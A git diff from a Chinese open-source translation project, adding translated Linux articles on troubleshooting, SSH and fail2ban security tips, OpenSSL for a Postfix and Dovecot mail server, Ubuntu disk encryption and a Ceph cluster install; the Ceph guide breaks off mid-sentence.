机器上可能有近乎无限的硬件组合,不可避免会导致了某种情况下的例外情况。最终用户其实也很少安装类似 Mac OS 或 Windows 这样的其它系统,因为它们都是随同新设备预安装的。 + +> 绝大多数的安装都按预期进行。 + +### 前景光明 + +其他提到的问题经常包括蓝牙、挂起/恢复,HiDPI 和触摸屏。您可能会看到这里形成一个模式,本文中提到的大多数问题集中在桌面用户。如果你已经意识到了这点,这其实是有意义的。Linux 桌面使用率相对较低,导致结果是,用于发现和解决相关问题的测试和资源很少。随着桌面使用量的增加,可以预期这些部分会改善。 + +在这方面,我认为最好提及的一个例子,曾经常常作为 Linux 的问题提出,但是反而最近很罕见:字体。几年前,获得高品质的抗锯齿字体常常是个问题。但是,随着现代发行版本的更新,它已成为常规。 + +你认为 2016 年最常见的 Linux 技术问题是什么? 请在评论中留言告诉我。 + +-------------------------------------------------------------------------------- + +作者简介: + +![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/jeremy-garcia.jpg?itok=kqOMWJIg) + +Jeremy Garcia - Jeremy Garcia is the founder of LinuxQuestions.org and an ardent but realistic open source advocate. Follow Jeremy on Twitter: @linuxquestions + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/1/yearbook-linux-troubleshooting-tips + +作者:[Jeremy Garcia][a] +译者:[Vic020](http://vicyu.net) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jeremy-garcia +[1]:http://www.openprinting.org/printers diff --git a/published/20170111 How to Keep Hackers out of Your Linux Machine Part 1 Top Two Security Tips.md b/published/20170111 How to Keep Hackers out of Your Linux Machine Part 1 Top Two Security Tips.md new file mode 100644 index 0000000000..5b044af5ed --- /dev/null +++ b/published/20170111 How to Keep Hackers out of Your Linux Machine Part 1 Top Two Security Tips.md @@ -0,0 +1,58 @@ +让你的 Linux 远离黑客(一):两个安全建议 +============================================================ + +![Keep hackers out](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-webinar.jpg?itok=af6QqiAm "Keep hackers out") + +> 在本系列中,我们将介绍五种将黑客拒之门外的最简单的方法。请观看免费网络研讨会以了解更多信息。 + +[Creative Commons Zero] [1] Pixabay + +在互联网上没有什么比美味的 Linux 机器让黑客更喜欢的了。在最近的 Linux 基金会网络研讨会中,我分享了黑客用来侵入的战术、工具和方法。 + +在这个系列的博文中,我们将介绍五种将黑客拒之门外的最简单的方法,并知道他们是否已经侵入。想要了解更多信息?请[观看免费的网络研讨会点播][4]。 + +### 简单的 Linux 安全提示 #1 + +**如果你没有在使用安全 shell,你应该取使用它。** + +这是一个有非常非常长时间的提示了。Telnet 是不安全的。 rLogin 是不安全的。仍然有服务需要这些,但它们不应该暴露在互联网上。如果你没有 SSH ,那就关闭互联网连接。我们总是说:使用 SSH 密钥。 + +SSH 规则 1:不要使用密码认证。SSH 规则 2:不要使用密码认证。SSH 规则 3:不要使用密码认证。重要的事情重复三遍。 + +如果你有一台 Linux 机器在互联网上,不管时间长短,你总是面临暴力破解。肯定会这样的。暴力破解用的是脚本。扫描器只要看到对互联网开放的端口 22,它们就会攻击它。 + +你可以做的另一件事是修改 SSH 的标准端口,我们许多人都这么做。这可以防止少量的暴力攻击,但是,一般来说,不使用密码认证,你会更安全。 + +SSH 的第四条规则:所有密钥都要设置密码。无密码密钥根本就不是真正的密钥。我知道如果你想要自动登录或自动化一些事情,这会使得难以处理,但所有的密钥应该有密码! + +我最喜欢做的就是入侵一台主机,并找到主目录与私钥。一旦我拥有了私钥,那你就玩完了。我可以闯入使用该公钥的任何地方。 + +如果你有口令短语,哪怕只是一个密码,它不用是你的密钥环的长密码,但是它会使我的行为更加、更加困难。 + +### 简单的 Linux 安全提示 #2 + +**安装 Fail2ban** + +我说的那些暴力攻击?fail2ban 将大大有助于你。它将自动激活 iptables 规则以阻止 SSH 到你的机器的重复尝试。把它配置好,让它不会把你关在门外或者占用太多的资源。要使用它、爱它、看着它。 + +它有自己的日志,所以一定要查看它们,并检查它是否在实际运行。这是一件非常重要的事情。 + +在[本系列的第 2 部分][5],我会给你三个更容易的安全提示,以让黑客远离你的 Linux 机器。你也可以[现在观看完整的免费网络研讨会][6]。 + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/news/webinar/2017/how-keep-hackers-out-your-linux-machine-part-1-top-two-security-tips + +作者:[Mike Guthrie][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/anch +[1]:https://www.linux.com/licenses/category/creative-commons-zero +[2]:https://www.linux.com/files/images/security-webinarjpg +[3]:http://bit.ly/2j89ISJ +[4]:http://bit.ly/2j89ISJ +[5]:https://www.linux.com/news/webinar/2017/how-keep-hackers-out-your-linux-machine-part-2-three-more-easy-security-tips +[6]:http://bit.ly/2j89ISJ diff --git a/translated/tech/20170112 OpenSSL For Apache and Dovecot Part 2.md b/published/20170112 OpenSSL For Apache and Dovecot Part 2.md similarity index 72% rename from translated/tech/20170112 OpenSSL For Apache and Dovecot Part 2.md rename to published/20170112 OpenSSL For Apache and Dovecot Part 2.md index a1c86bee2f..8870ff1bc4 100644 --- a/translated/tech/20170112 OpenSSL For Apache and Dovecot Part 2.md +++ b/published/20170112 OpenSSL For Apache and Dovecot Part 2.md @@ -1,18 +1,19 @@ -OpenSSL 在 Apache 和 Dovecot 下的使用:第二部分 +OpenSSL 在 Apache 和 Dovecot 下的使用(二) ============================================================ ![OpenSSL](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/key-openssl_0.jpg?itok=FDO3qAOt "OpenSSL") -本篇中,Carla Schroder 会解释如何使用 OpenSSL 保护你的 Postfix/Dovecot 邮件服务器 + +> 本篇中,Carla Schroder 会解释如何使用 OpenSSL 保护你的 Postfix/Dovecot 邮件服务器 [Creative Commons Zero][1]Pixabay 在[上周][11],作为我们 OpenSSL 系列的一部分,我们学习了如何配置 Apache 以使用 OpenSSL 并强制所有会话使用 HTTPS。 今天,我们将使用 OpenSSL 保护我们的 Postfix/Dovecot 邮件服务器。这些示例基于前面的教程; 请参阅最后的参考资料部分,了解本系列中以前的所有教程的链接。 -你需要配置 Postfix 以及 Dovecot 来使用 OpenSSL,我们将使用我们在[在 Apache 和 Dovecot 中使用 OpenSSL][12]中创建的密钥和证书。 +你需要配置 Postfix 以及 Dovecot 都使用 OpenSSL,我们将使用我们在[OpenSSL 在 Apache 和 Dovecot 下的使用(一)][12]中创建的密钥和证书。 ### Postfix 配置 -你必须编辑 `/etc/postfix/main.cf` 以及 `/etc/postfix/master.cf`。`main.cf` 这个例子是完整的配置,它在我们先前的教程中构建过了。替换成你自己的 OpenSSL 密钥和证书名以及本地网络。 +你必须编辑 `/etc/postfix/main.cf` 以及 `/etc/postfix/master.cf`。实例的 `main.cf` 是完整的配置,基于我们先前的教程。替换成你自己的 OpenSSL 密钥和证书名以及本地网络地址。 ``` compatibility_level=2 @@ -47,7 +48,7 @@ smtpd_sasl_path = private/auth smtpd_sasl_authenticated_header = yes ``` -在 `master.cf` 解除 `submission inet` 部分的注释,并编辑 `smtpd_recipient_restrictions`: +在 `master.cf` 取消 `submission inet` 部分的注释,并编辑 `smtpd_recipient_restrictions`: ``` #submission inet n - y - - smtpd @@ -67,7 +68,7 @@ $ sudo service postfix reload ### Dovecot 配置 -在我们以前的教程中,我们为 Dovecot 在 `/etc/dovecot/dovecot.conf` 创建了一个配置文件,而不是使用多个默认配置文件。这是一个建立在我们以前的教程的完整配置。再说一次,使用你自己的 OpenSSL 密钥和证书,以及你自己的 `userdb` 家文件: +在我们以前的教程中,我们为 Dovecot 创建了一个单一配置文件 `/etc/dovecot/dovecot.conf`,而不是使用多个默认配置文件。这是一个基于我们以前的教程的完整配置。再说一次,使用你自己的 OpenSSL 密钥和证书,以及你自己的 `userdb` 的 home 文件: ``` protocols = imap pop3 lmtp @@ -125,7 +126,7 @@ $ sudo service postfix reload ### 用 telnet 测试 -就像我们以前一样,现在我们可以通过使用 telnet 发送消息来测试我们的设置。 但是等等,你说 telnet 不支持 TLS/SSL,那么怎么能这样呢?首先通过使用 `openssl s_client` 打开一个加密会话。`openssl s_client` 的输出将显示你的证书、指纹和大量其他信息,以便你知道你的服务器正在使用正确的证书。会话建立后输入的命令以粗体显示: +就像我们以前一样,现在我们可以通过使用 telnet 发送消息来测试我们的设置。 但是等等,你说 telnet 不支持 TLS/SSL,那么这样怎么办呢?首先通过使用 `openssl s_client` 打开一个加密会话。`openssl s_client` 的输出将显示你的证书及其指纹和大量其它信息,以便你知道你的服务器正在使用正确的证书。会话建立后输入的命令都是不以数字开头的: ``` $ openssl s_client -starttls smtp -connect studio:25 @@ -158,7 +159,7 @@ quit 221 2.0.0 Bye ``` -你应该可以在邮件客户端中看到一条新邮件,并在打开 SSL 证书时要求你验证 SSL 证书。你也可以使用 `openssl s_client` 来测试 Dovecot POP3 和 IMAP 服务。此示例测试加密的 POP3,#5 消息是我们在 telnet(上面)中创建的: +你应该可以在邮件客户端中看到一条新邮件,并在打开时要求你验证 SSL 证书。你也可以使用 `openssl s_client` 来测试 Dovecot 的 POP3 和 IMAP 服务。此示例测试加密的 POP3,第 5 号消息是我们在 telnet(如上)中创建的: ``` $ openssl s_client -connect studio:995 @@ -203,7 +204,7 @@ closed ### 现在做什么? -现在你有一个很好的有适当的 TLS/SSL 保护的邮件服务器了。我鼓励你深入学习 Postfix 以及 Dovecot; 这些教程中的示例尽可能地简单,不包括对安全性、防病毒扫描程序、垃圾邮件过滤器或任何其他高级功能的微调。我认为当你有一个基本工作系统时更容易学习高级功能。 +现在你有一个功能良好的,具有合适的 TLS/SSL 保护的邮件服务器了。我鼓励你深入学习 Postfix 以及 Dovecot; 这些教程中的示例尽可能地简单,不包括对安全性、防病毒扫描程序、垃圾邮件过滤器或任何其他高级功能的调整。我认为当你有一个基本工作系统时更容易学习高级功能。 下周回到 openSUSE 包管理备忘录上。 @@ -214,7 +215,7 @@ closed * [在 Ubuntu Linux 上构建电子邮件服务器:第2部分][5] * [在 Ubuntu Linux 上构建电子邮件服务器:第3部分][6] * [给初学者看的在 Ubuntu Linux 上使用 Apache][7] -* [初学者看的在 Ubuntu Linux 上使用 Apache:第二部分][8] +* [给初学者看的在 Ubuntu Linux 上使用 Apache:第二部分][8] * [给初学者看的在 CentOS Linux 上使用 Apache][9] * [消灭让人害怕的 web 浏览器 SSL 警告][10] @@ -224,20 +225,20 @@ via: https://www.linux.com/learn/intro-to-linux/openssl-apache-and-dovecot-part- 作者:[CARLA SCHRODER][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 [a]:https://www.linux.com/users/cschroder [1]:https://www.linux.com/licenses/category/creative-commons-zero [2]:https://www.linux.com/files/images/key-openssljpg-0 -[3]:https://www.linux.com/learn/sysadmin/openssl-apache-and-dovecot -[4]:https://www.linux.com/learn/how-build-email-server-ubuntu-linux -[5]:https://www.linux.com/learn/sysadmin/building-email-server-ubuntu-linux-part-2 -[6]:https://www.linux.com/learn/sysadmin/building-email-server-ubuntu-linux-part-3 +[3]:https://linux.cn/article-8167-1.html +[4]:https://linux.cn/article-8071-1.html +[5]:https://linux.cn/article-8077-1.html +[6]:https://linux.cn/article-8088-1.html [7]:https://www.linux.com/learn/apache-ubuntu-linux-beginners [8]:https://www.linux.com/learn/apache-ubuntu-linux-beginners-part-2 [9]:https://www.linux.com/learn/apache-centos-linux-beginners [10]:https://www.linux.com/learn/quieting-scary-web-browser-ssl-alerts -[11]:https://www.linux.com/learn/sysadmin/openssl-apache-and-dovecot -[12]:https://www.linux.com/learn/sysadmin/openssl-apache-and-dovecot +[11]:https://linux.cn/article-8167-1.html +[12]:https://linux.cn/article-8167-1.html diff --git a/published/20170113 How to Encrypt Your Hard Disk in Ubuntu.md b/published/20170113 How to Encrypt Your Hard Disk in Ubuntu.md new file mode 100644 index 0000000000..ca7ef64c55 --- /dev/null +++ b/published/20170113 How to Encrypt Your Hard Disk in Ubuntu.md @@ -0,0 +1,110 @@ +如何在 Ubuntu 中加密硬盘 +========================= + ![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/hdd-encryption-ubuntu.jpg "How to Encrypt Your Hard Disk in Ubuntus") + +隐私保护、安全和加密是不可分开的,用户可以通过加密来提高安全和保护操作系统的隐私信息。本文将会介绍在 Ubuntu Linux 中对硬盘全盘加密的优缺点。此外,我们也介绍如何在系统级别上进行加密设置,并对一些目录进行加密。加密是非常有用的,而且也没有你想象中那么复杂。综上所述,让我开始进行加密吧。 + +### 加密的优缺点 + +尽管进行全盘加密听起来非常棒,但是否要这么做还是有些争议的。我们先来看看这个做法有哪些优缺点。 + +#### 加密的优点 + +* 提高私密程度 +* 只有拥有密钥的人才能访问操作系统及其中文件 +* 确保政府或者黑客无法侦测你的系统和侵犯你的隐私 + +#### 加密的缺点 + +* 在其他的 Linux 操作系统上访问和挂载文件系统将变得困难 +* 无法从那些加密分区中恢复数据 +* 如果用户丢失了加密密钥,那就彻底悲剧了 + +### 安装前的准备 + +在 Ubuntu 中加密最好就是在安装进程开始之前在系统层面进行。在 Ubuntu 安装进程开始之后是无法加密的,所以先备份你的重要数据到 [Dropbox][10]、 [Google Drive][11] (或者其它硬盘上),然后后准备重新安装 Ubuntu。 + +![ubuntu 下载](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-ubuntu-alternative-downloads.jpg "ubuntu-encrypt-ubuntu-alternative-downloads") + +从 [此处][12] 开始下载最新版本的 Ubuntu,并制作好可启动的 U 盘 (需要至少 2 GB 可用空间)。 + +制作启动 U 盘需要一个烧录程序,可以到 [etcher.io][13] 去下载。下载好之后解压 zip 文件,右击 (或者使用鼠标选定之后按下回车) 解压出来的文件以运行。 + +![烧录程序](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-etcher.jpg "ubuntu-encrypt-etcher") + +**注意**:烧录程序会询问是否创建图标,选择“yes”。 + +在烧录程序中点击“选择镜像(Select Image)”按钮,选择之前下载好的 Ubuntu ISO 镜像。然后插入你的 U 盘。烧录程序会自动检测并为你选择。最后,点击“开始烧录( Flash)”按钮来开始创建进程。 + +完成之后,重启电脑至 BIOS,设置为 U 盘启动。 + +**注意**:如果你的电脑不支持从 U 盘启动,下载 32 位的 Ubuntu,并使用你电脑中的烧录软件将其烧录到 DVD 中。 + +### 对你的硬盘进行全盘加密 + +加载好 Live Ubuntu 之后,安装进程就可以开始了。当 Ubuntu 安装进程开始之后,会出现下面这样一个界面。注意每个人安装进程都可能不同的,或许你会看到的不太一样。 + +![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-installation-type1.jpg "ubuntu-encrypt-installation-type") + +选择“擦除磁盘并安装 Ubuntu (Erase disk and install Ubuntu)”,并选择“加密新装的 Ubuntu 以提高安全程度(Encrypt the new Ubuntu installation for Security)”来开始加密的安装进程。这样会自动选择 LVM。两个选框都必须选中。选好加密选项之后,点击“现在安装(Install Now)”。 + +**注意**:如果是双系统启动的话,你需要安装到空余磁盘空间,而非擦除磁盘。选择好之后,像上边一样选择加密选项。 + +选择加密选项并开始安装之后,会出现一个加密配置页面。这个页面用户需要为安装进程设置自己的加密密钥。 + +![设置安全密码](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-choose-security-key.jpg "ubuntu-encrypt-choose-security-key") + +输入安全密钥。该安全密钥设置窗口会自动为你输入的密钥进行密码强度评级,使用这个功能时看着后边的显示,直到显示为“高强度密码(strong password)”为止。输入完成后,在下方在此输入来确认密码,最后用一张纸把密码写下下来妥善保管。 + +此外,选定“覆些磁盘空余空间(Overwrite empty disk space)”,当然这是一个可选步骤。一切准备就绪之后点击现在安装即可。 + +![选择时区](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-timezone-select.jpg "ubuntu-encrypt-timezone-select") + +在设置完加密密钥之后,就是传统的 Ubuntu 安装配置了。选择时区、创建用户以及对应的安全密码。 + +![加密家目录](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-home-folder-e1483900399596.jpg "ubuntu-encrypt-home-folder") + +与创建和加密 Ubuntu 磁盘对应,在创建用户的时记得候选择“登录系统需要密码(require my password to log in)”和“加密我的家目录(encrypt my home folder)”。这样可以为你的数据再增加一层保护。 + +等到用户名、加密设置以及其他所有事情都完成之后,Ubuntu 安装进程就可以开始了。随后,安装进程会告知你安装已完成,移除安装介质后重启即可享受 Ubuntu 之旅。 + +### 结论 + +进行磁盘加密之后,如果没有加密密钥则无法开启 Ubuntu。尽管无趣,但这种级别的加密使用最容易的,并且还充分利用了操作系统提供的特性。用户不需要过多的知识,或者使用其他第三方程序就可以很快完成加密要求。 + +![加密电脑](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/01/ubuntu-encrypt-decrypt-computer.jpg "ubuntu-encrypt-decrypt-computer") + +加密之后的 Ubuntu,使用起来和没有加密的并没有什么区别。不需要其他的步骤,也不需要学习什么复杂的解密方法。对于那些非常在意隐私但又不想太过麻烦的人来说,这个提高安全等级的方法是必须学会的(当然,这很容易不是吗)。 + +你是否会使用 Ubuntu 对硬盘进行加密呢?在下方评论告诉我们。 + +--------------------------------- + +译者简介: + +[GHLandy](http://GHLandy.com) —— 欲得之,则为之奋斗 (If you want it, work for it.)。 + +----------------------------------- + +via: https://www.maketecheasier.com/encrypt-hard-disk-in-ubuntu/ + +作者:[Derrik Diener][a] +译者:[GHLandy](https://github.com/GHLandy) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/derrikdiener/ +[1]:https://www.maketecheasier.com/author/derrikdiener/ +[2]:https://www.maketecheasier.com/encrypt-hard-disk-in-ubuntu/#comments +[3]:https://www.maketecheasier.com/category/linux-tips/ +[4]:http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.maketecheasier.com%2Fencrypt-hard-disk-in-ubuntu%2F +[5]:http://twitter.com/share?url=https%3A%2F%2Fwww.maketecheasier.com%2Fencrypt-hard-disk-in-ubuntu%2F&text=How+to+Encrypt+Your+Hard+Disk+in+Ubuntu +[6]:mailto:?subject=How%20to%20Encrypt%20Your%20Hard%20Disk%20in%20Ubuntu&body=https%3A%2F%2Fwww.maketecheasier.com%2Fencrypt-hard-disk-in-ubuntu%2F +[7]:https://www.maketecheasier.com/why-is-iphone-overheating/ +[8]:https://www.maketecheasier.com/it-security-ethical-hacking-training/ +[9]:https://support.google.com/adsense/troubleshooter/1631343 +[10]:http://www.maketecheasier.com/tag/dropbox +[11]:http://www.maketecheasier.com/tag/google-drive +[12]:https://www.ubuntu.com/download/alternative-downloads +[13]:https://etcher.io/ diff --git a/translated/tech/20170113 How to install a Ceph Storage Cluster on Ubuntu 16.04.md b/published/20170113 How to install a Ceph Storage Cluster on Ubuntu 16.04.md similarity index 68% rename from translated/tech/20170113 How to install a Ceph Storage Cluster on Ubuntu 16.04.md rename to published/20170113 How to install a Ceph Storage Cluster on Ubuntu 16.04.md index 6ca66be13a..4fd4f6f50a 100644 --- a/translated/tech/20170113 How to install a Ceph Storage Cluster on Ubuntu 16.04.md +++ b/published/20170113 How to install a Ceph Storage Cluster on Ubuntu 16.04.md @@ -1,33 +1,23 @@ -如何在Ubuntu 16.04中安装 Ceph 存储集群 +如何在 Ubuntu 16.04 中安装 Ceph 存储集群 ============================================================ -### 在此页 - -1. [第1步 - 配置所有节点][1] -2. [第2步 - 配置 SSH 服务器][2] -3. [第3步 - 配置 Ubuntu 防火墙][3] -4. [第4步 - 配置 Ceph OSD 节点][4] -5. [第5步 - 建立 Ceph 集群][5] -6. [第6步 - 测试 Ceph][6] -7. [参考][7] - -Ceph 是一个高性能,可靠行和可扩展性的开源存储平台。他是一个自由的分部署存储系统,提供了一个对象,块,文件级存储接口和缺少一个节点依然可以运行的特性。 +Ceph 是一个高性能、可靠、可扩展的开源存储平台。它是一个自由的分布式存储系统,提供了对象、块和文件级存储的接口,并可以不受单点故障的影响而运行。 在这个教程中,我将指导你在 Ubuntu 16.04 服务器上安装建立一个 Ceph 集群。Ceph 集群包括这些组件: -* **Ceph OSDs (ceph-osd)** - 控制数据存储,数据复制和恢复。Ceph 集群需要至少两个 Ceph OSD 服务器。这次安装我们将使用三个 Ubuntu 16.04 服务器。 -* **Ceph Monitor (ceph-mon)** - 监控集群状态和运行的 OSD 映射 和 CRUSH 映射。这里我们使用一个服务器。 +* **Ceph OSD (ceph-osd)** - 控制数据存储,数据复制和恢复。Ceph 集群需要至少两个 Ceph OSD 服务器。这次安装中我们将使用三个 Ubuntu 16.04 服务器。 +* **Ceph Monitor (ceph-mon)** - 监控集群状态并运行 OSD 映射 和 CRUSH 映射。这里我们使用一个服务器。 * **Ceph Meta Data Server (ceph-mds)** - 如果你想把 Ceph 作为文件系统使用,就需要这个。 -### **前提条件** +### 前提条件 -* 6个安装了 Ubuntu 16.04 的服务器节点 +* 6 个安装了 Ubuntu 16.04 的服务器节点 * 所有节点上的 root 权限 我将使用下面这些 hostname /IP 安装: ``` -hostname IP address +主机名 IP 地址 ceph-admin 10.0.15.10 mon1 10.0.15.11 osd1 10.0.15.21 @@ -36,20 +26,20 @@ osd3 10.0.15.23 client 10.0.15.15 ``` -### 第1步 - 配置所有节点 +### 第 1 步 - 配置所有节点 -这次安装,我将配置所有的6个节点来准备安装 Ceph 集群软件。所以你必须在所有节点运行下面的命令。然后确保所有节点都安装了 ssh-server。 +这次安装,我将配置所有的 6 个节点来准备安装 Ceph 集群软件。所以你必须在所有节点运行下面的命令。然后确保所有节点都安装了 ssh-server。 -**创建 Ceph 用户** +#### 创建 Ceph 用户 -在所有节点创建一个名为'**cephuser**'的新用户 +在所有节点创建一个名为 `cephuser` 的新用户 ``` useradd -m -s /bin/bash cephuser passwd cephuser ``` -创建完新用户后,我们需要配置 **cephuser** 无密码 sudo 权限。这意味着 ‘cephuser’ 首次可以不输入密码执行和获取 sudo 权限。 +创建完新用户后,我们需要给 `cephuser` 配置无密码的 sudo 权限。这意味着 `cephuser` 可以不先输入密码而获取到 sudo 权限运行。 运行下面的命令来完成配置。 @@ -59,9 +49,9 @@ chmod 0440 /etc/sudoers.d/cephuser sed -i s'/Defaults requiretty/#Defaults requiretty'/g /etc/sudoers ``` -**安装和配置 NTP** +#### 安装和配置 NTP -安装 NTP 来同步所有节点的日期和时间。运行 ntpdate 命令通过 NTP 设置日期。我们将使用 US 池 NTP 服务器。然后开启并使 NTP 服务在开机时启动。 +安装 NTP 来同步所有节点的日期和时间。先运行 `ntpdate` 命令通过 NTP 设置日期。我们将使用 US 池的 NTP 服务器。然后开启并使 NTP 服务在开机时启动。 ``` sudo apt-get install -y ntp ntpdate ntp-doc @@ -71,15 +61,15 @@ systemctl enable ntp systemctl start ntp ``` -**安装 Open-vm-tools** +#### 安装 Open-vm-tools -如果你正在VMware里运行所有节点,你需要安装这个虚拟化工具。 +如果你正在 VMware 里运行所有节点,你需要安装这个虚拟化工具。 ``` sudo apt-get install -y open-vm-tools ``` -**安装 Python 和 parted** +#### 安装 Python 和 parted 在这个教程,我们需要 python 包来建立 ceph 集群。安装 python 和 python-pip。 @@ -87,15 +77,15 @@ sudo apt-get install -y open-vm-tools sudo apt-get install -y python python-pip parted ``` -**配置 Hosts 文件** +#### 配置 Hosts 文件 -用 vim 编辑器编辑所有节点的 hosts 文件。 +用 vim 编辑器编辑所有节点的 `hosts` 文件。 ``` vim /etc/hosts ``` -Paste the configuration below: +粘帖如下配置: ``` 10.0.15.10 ceph-admin @@ -106,9 +96,9 @@ Paste the configuration below: 10.0.15.15 ceph-client ``` -保存 hosts 文件,然后退出 vim 编辑器。 +保存 `hosts` 文件,然后退出 vim 编辑器。 -现在你可以试着在两个服务器间 ping 主机名来测试网络连通性。 +现在你可以试着在两个服务器间 `ping` 主机名来测试网络连通性。 ``` ping -c 5 mon1 @@ -118,24 +108,24 @@ ping -c 5 mon1 ![Ceph cluster Installation on Ubuntu 16.04](https://www.howtoforge.com/images/how-to-install-a-ceph-cluster-on-ubuntu-16-04/1.png) ][8] -### 第2步 - 配置 SSH 服务器 +### 第 2 步 - 配置 SSH 服务器 -这一步,我们将配置 **ceph-admin 节点**。管理节点是用来配置监控节点和 osd 节点的。登录到 ceph-admin 节点然后使用 '**cephuser**'。 +这一步,我们将配置 **ceph-admin 节点**。管理节点是用来配置监控节点和 osd 节点的。登录到 ceph-admin 节点然后使用 `cephuser` 用户。 ``` ssh root@ceph-admin su - cephuser ``` -管理节点用来安装配置所有集群节点,所以 ceph-admin 用户必须有不使用密码连接到所有节点的权限。我们需要为 'ceph-admin' 节点的 'cephuser' 用户配置无密码登录权限。 +管理节点用来安装配置所有集群节点,所以 ceph-admin 上的用户必须有不使用密码连接到所有节点的权限。我们需要为 'ceph-admin' 节点的 `cephuser` 用户配置无密码 SSH 登录权限。 -生成 '**cephuser**' 的 ssh 密钥。 +生成 `cephuser` 的 ssh 密钥。 ``` ssh-keygen ``` -让密码为空 +让密码为空。 下面,为 ssh 创建一个配置文件 @@ -143,7 +133,7 @@ ssh-keygen vim ~/.ssh/config ``` -Paste the configuration below: +粘帖如下配置: ``` Host ceph-admin @@ -177,13 +167,13 @@ Host ceph-client ![Ceph-admin configuration](https://www.howtoforge.com/images/how-to-install-a-ceph-cluster-on-ubuntu-16-04/2.png) ][9] -改变配置文件权限为644。 +改变配置文件权限为 644。 ``` chmod 644 ~/.ssh/config ``` -现在使用 ssh-copy-id 命令增加密钥到所有节点。 +现在使用 `ssh-copy-id` 命令增加密钥到所有节点。 ``` ssh-keyscan ceph-osd1 ceph-osd2 ceph-osd3 ceph-client mon1 >> ~/.ssh/known_hosts @@ -193,7 +183,7 @@ ssh-copy-id ceph-osd3 ssh-copy-id mon1 ``` -当请求输入密码时输入你的 cephuser 密码。 +当请求输入密码时输入你的 `cephuser` 密码。 [ ![Ceph-admin deploy ssh key to all cluster nodes](https://www.howtoforge.com/images/how-to-install-a-ceph-cluster-on-ubuntu-16-04/3.png) @@ -209,9 +199,9 @@ ssh ceph-osd1 ![SSH Less password from ceph-admin to all nodes cluster](https://www.howtoforge.com/images/how-to-install-a-ceph-cluster-on-ubuntu-16-04/4.png) ][11] -### 第3步 - 配置 Ubuntu 防火墙 +### 第 3 步 - 配置 Ubuntu 防火墙 -出于安全原因,我们需要在服务器打开防火墙。我们更愿使用 Ufw(不复杂的防火墙),Ubuntu 默认的防火墙,来保护系统。在这一步,我们在所有节点开启 ufw,然后打开 ceph-admin,ceph-mon 和 ceph-osd 需要使用的端口。 +出于安全原因,我们需要在服务器打开防火墙。我们更愿使用 Ufw(不复杂防火墙)来保护系统,这是 Ubuntu 默认的防火墙。在这一步,我们在所有节点开启 ufw,然后打开 ceph-admin、ceph-mon 和 ceph-osd 需要使用的端口。 登录到 ceph-admin 节点,然后安装 ufw 包。 @@ -220,7 +210,7 @@ ssh root@ceph-admin sudo apt-get install -y ufw ``` -打开 80,2003 和 4505-4506 端口,然后重载防火墙。 +打开 80,2003 和 4505-4506 端口,然后重启防火墙。 ``` sudo ufw allow 22/tcp @@ -239,7 +229,7 @@ sudo ufw enable ![UFW Firewall with Ceph service](https://www.howtoforge.com/images/how-to-install-a-ceph-cluster-on-ubuntu-16-04/5.png) ][12] -从 ceph-admin 节点,登录到监控节点 'mon1' 然后安装 ufw。 +从 ceph-admin 节点,登录到监控节点 mon1 然后安装 ufw。 ``` ssh mon1 @@ -254,7 +244,7 @@ sudo ufw allow 6789/tcp sudo ufw enable ``` -最后,在每个 osd 节点:ceph-osd1,ceph-osd2 和 ceph-osd3 打开这些端口 6800-7300。 +最后,在每个 osd 节点 ceph-osd1、ceph-osd2 和 ceph-osd3 上打开这些端口 6800-7300。 从 ceph-admin 登录到每个 ceph-osd 节点安装 ufw。 @@ -263,7 +253,7 @@ ssh ceph-osd1 sudo apt-get install -y ufw ``` -在 osd 节点打开端口并重载防火墙。 +在 osd 节点打开端口并重启防火墙。 ``` sudo ufw allow 22/tcp @@ -273,12 +263,12 @@ sudo ufw enable ufw 防火墙配置完成。 -### 第4步 - 配置 Ceph OSD 节点 +### 第 4 步 - 配置 Ceph OSD 节点 这个教程里,我们有 3 个 OSD 节点,每个节点有两块硬盘分区。 -1. **/dev/sda** for root partition -2. **/dev/sdb** is empty partition - 20GB +1. **/dev/sda** 用于根分区 +2. **/dev/sdb** 空闲分区 - 20GB 我们要使用 **/dev/sdb** 作为 ceph 磁盘。从 ceph-admin 节点,登录到所有 OSD 节点,然后格式化 /dev/sdb 分区为 **XFS** 文件系统。 @@ -294,19 +284,19 @@ ssh ceph-osd3 sudo fdisk -l /dev/sdb ``` -格式化 /dev/sdb 分区为 XFS 文件系统,使用 parted 命令创建一个 GPT 分区表。 +格式化 /dev/sdb 分区为 XFS 文件系统,使用 `parted` 命令创建一个 GPT 分区表。 ``` sudo parted -s /dev/sdb mklabel gpt mkpart primary xfs 0% 100% ``` -下面,使用 mkfs 命令格式化分区为 XFS 格式。 +下面,使用 `mkfs` 命令格式化分区为 XFS 格式。 ``` sudo mkfs.xfs -f /dev/sdb ``` -现在检查分区,然后你会看见 XFS /dev/sdb 分区。 +现在检查分区,然后你会看见一个 XFS 